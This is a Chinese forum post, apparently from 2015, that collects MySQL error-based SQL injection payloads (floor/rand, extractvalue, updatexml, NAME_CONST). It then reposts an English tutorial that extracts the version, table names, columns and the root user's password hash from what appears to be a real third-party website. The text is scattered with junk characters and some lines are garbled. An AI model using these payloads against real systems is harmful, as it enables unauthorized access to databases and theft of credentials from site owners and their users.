|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
8 \* J7 g4 G% Q+ \4 Y4 `首先进行正常查询: mysql> select * from article where id = 1;
6 P: O6 _9 f! h2 o# h9 p+—-+——-+———+( j' w2 \8 U5 B+ S/ S
| id | title | content |
8 a! H9 B0 H+ |! ^3 Q+—-+——-+———+! G2 k6 Z+ h' c N, @8 h
| 1 | test | do it |% ^4 @( G" Z4 @0 a7 ?
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);% T% C% k2 M2 b+ R: l6 _8 Q
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
b: G \0 C% ]7 i例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
9 Z' v! E# E" e" }( mERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
! P. i: k9 f9 V) Y; @ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
& p9 H# @4 [0 }) o4 Z! G$ w测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–7 n$ O- a6 v" f
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
; G4 k6 l* c5 x& n ~$ {! @9 v9 D/ V- c: l# E& U
再收集: 3 S4 V$ d& E" d" @) O
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
+ k0 N5 G1 l- z6 k2 _0 p! k3 x: B+ C* X" `
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’5 u5 p" [: B4 t4 u! }$ z
! H/ m3 H4 A! f! Yhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
; a% W" V' f7 z7 f. }; p, R8 E9 _0 O: A
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
`( H, E: q* Y5 }4 m6 u4 [1 `+ K+ d. `. K) R5 \# d/ Z
MYSQL高版本报错注入技巧-利用NAME_CONST注入
; |2 g/ W# X' F J; z3 C; FIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
' U1 N, S5 h% g8 G( H& @+ \ _
/ z% Y6 F* N" X# J& X; b* p
% U- t- m1 G0 n3 l3 W相关信息$ }$ Z2 g2 _& a; I @# F
5 n7 `0 d8 z4 F
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
+ J9 @5 W; q; V9 B: v
3 u& \+ B; F( |1 {* e7 t; S7 nCode:
- ` i7 G& R. ]NAME_CONST(DATA, VALUE)
3 t, z" A; ]3 E) N0 ^+ U9 u
3 j, n2 a, z7 e5 J+ H" GReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
* w/ H% Q6 k( @ l* @( M% v% C7 U9 y+ {& Z' n+ _
SELECT NAME_CONST('TEST', 1)
. Z' f* D" c7 {
" ]* g3 ]( U& I% @/ z% J
, T7 _; h# P0 i/ z+ }) p- b( @# Y; t9 y
|---------------|
$ h# x1 e+ M& M8 C# _1 m# J| TEST |# y+ b4 [/ v# Z8 o* k2 W. _ S2 H& e
| |
5 k# ^3 w2 d# e0 l* _! }|---------------|
u, U& h9 D6 l+ C| 1 |4 q$ }. u+ d9 S5 ~
| |
* E' Y0 X+ c( @0 U|---------------|! _; k# H5 l3 y* e# P1 J
0 g2 g* b7 I* J
/ J$ ^) C Q9 Q/ O6 d' M" W/ U
: q* o) I# E7 C
0 q4 o# D: H; mhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const9 A/ }# N9 j8 L* B1 u) i; ^+ b
Intro to MySQL Variables
* R4 A) m9 b9 R4 g6 i: ^
4 a1 A. t+ `3 u# dOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
3 r/ v9 N% n7 ?/ N# I1 ?& H: a* M, _6 u
Code:; i- M! F% x6 q. w0 L4 U
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
" G* ?2 s N& }0 I+ I G8 N7 V5 ]4 B3 x! q9 o7 Z& f
S! b- O2 ?2 K
M4 B% W+ D- S7 ?5 z2 J9 k4 V3 ], `# x. z6 R
) u8 r: r0 j3 \/ ~1 H/ S. F: @
Code:
6 ?0 y: C0 v6 M7 sand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--6 s" O( ~, ?3 z6 P; v
9 }" @# d; ^, X5 X/ Z4 p
! ~. d7 K0 e wVAR = Your MySQL variable.
% c% b8 b [6 K( s1 C9 e8 `& _, g; @
MySQL 5.1.3 Server System Variables
; u. ?, s; W( x: e1 U$ ^) e+ \8 L5 v' V7 d6 e
Let's try it out on my site..8 U/ I% W0 x$ K5 J& M
/ |7 d; J9 c/ e
Code:
! v( V3 m7 _0 T; {; r7 {http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
% x0 E0 U9 k! Q0 s4 A
: p+ S; p" ?" ~! q$ t* B% e+ vErroruplicate column name '5.0.27-community-nt'8 i- N0 E/ X& k1 j a
7 R- K' A$ F/ a
9 w/ W0 Q6 W) A3 l0 s# ^. x5 |
/ R( i4 ~4 P8 N
: c( m: U$ {5 p- b
3 Z8 w2 [7 u2 ]- V2 l* VNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...' }8 ]5 H) w. z9 J
' j! w& e. [! _) T0 hData Extraction
' ]3 r1 ?$ r6 G- u5 Y* g9 s- Q
$ n2 J' e" r2 S- O/ KCode:
$ K3 v- y% B5 g+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
, ^) N; d% @* u* f8 B8 d* z0 ~* Z- r- V; n5 A; _
. v4 B/ P4 t0 ^& z4 A4 v4 P: HWe should get a duplicate column 1 error...( r, J5 y- z2 e4 \1 T. _5 A, Q' L* f
- _# @! u0 g8 DCode:
6 @* I' ?" j( L/ O; _9 Ihttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--1 j8 j: X8 ?5 W/ U4 B
: J+ g; `+ U, a1 y: x$ B6 }Erroruplicate column name '1
) S* C5 Z# Z! H& L( i) B/ ^0 K
8 g4 W- ?, n" E$ }+ c8 @6 K# K) ?( b; P
) N3 \* E: {/ o" v! l
' ~% ]8 O( z! }% ^9 t
6 |3 S- @% l- G/ a! r7 j8 c, g# N$ Z) E: t+ x3 ~
Now let's get the tables out this bitch..' f0 {$ `& X7 @. A! B
% D8 Z" X) ~7 J: [+ v& V% V; u& LCode:
1 j/ B* B- {2 f* K. O" u# l1 I+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
+ N- Q# V, }" V* R* T. ^8 k4 ~( Q+ n5 c. ?+ n
& N U7 e0 W% Z+ J$ FLet's see if it works here, if it does, we can go on and finish the job.
! z' i2 l! N6 w( j3 \; i0 [: _3 U8 Z( x5 k3 z0 f% q2 ^
Code:
9 k7 H. u- c4 R$ e. g; w1 G) khttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
. s( Q4 M! d( t7 ^0 N' h* Z% L+ {7 L8 ?2 W3 z0 l4 K! V7 i
( O @7 o$ D* B- M9 k" q5 wErroruplicate column name 'com_admanage# X& p$ Z4 }9 H$ u: t- K1 P4 o
* I" H B0 [* O
5 o* `& F0 T/ |" N6 s
& y A& R2 c, e8 S: n5 j( v) e9 N x7 ]6 X' B% m* r
1 l% i' H7 B6 p6 g; C$ W2 i
: l; [5 B+ s5 p6 C. |( s8 jNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.9 j; ^4 r$ u: j' `
2 F3 @& X6 a$ a4 U4 Q
Let's get the columns out of the user table..$ m, l& [1 ~; E' Q5 j* s
' r; P! k0 [# c) @8 Z3 x9 F
Code:* ~4 U( ?3 _& d1 ?, \
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--9 `( B, x$ L5 n0 s
1 y2 @: `5 _/ A
) J( [9 T7 }- p6 HSo mine looks like this, and I get the duplicate column name 'Host'.
. w) `, {7 a- E- d8 U0 e( m
0 u0 o) D& y- Z* BCode:
, x6 l6 {# g' Q4 F* P! e4 Yhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--6 w9 l* h, ^* ?! G5 R/ ?; A7 V: b8 ?0 X2 A
* h$ ]& A) A. t' f& I8 k
Erroruplicate column name 'Host'
$ \' @3 h' g* j6 |, H3 M' s }, K3 B+ N
$ A. s& |9 j9 a; m* A& d3 F
4 o( ^' U- \* _: t- |- ]& B5 i6 w1 ~( _0 c% h, F: R/ \
1 T" A3 s2 w6 D
/ [1 z, \: O$ H9 K* R5 hWoot, time to finish this bitch off.. u) C2 r3 Y M4 W% b3 F6 G
( `6 o' R6 d$ o; }; f
Code:9 {1 v: T: D! \3 _8 T7 H
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
1 A" x6 q5 J3 `/ `2 C8 t
% A5 l3 t" O4 T+ v) g) E0 o R/ h
So mine looks like this...
! g! M/ m3 x- H" [
* H* z8 k3 T0 bCode:% W A- F c/ P5 _* J
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
1 s- d0 g# U" H" M; b& F4 e% E" j8 i( m% f% E
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
0 K" n p1 [/ E' T1 o: F9 \
& J4 G& n, k) n8 j ^/ a/ E
% Q8 F/ W: ~# a+ y$ p; S/ s! P
# a; m, }; x" R
( u, v: `0 u0 |8 R5 n/ {* X. Q
$ h: E/ H& d, E2 O! m+ @; D8 _/ ~$ f' p8 D! N, p2 v
And there we have it, thanks for reading.
2 |$ S5 A' K; y& d" b) f& S# u1 k; e P. f0 k
|
发表于 2015-11-11 19:03:37
收藏
支持
反对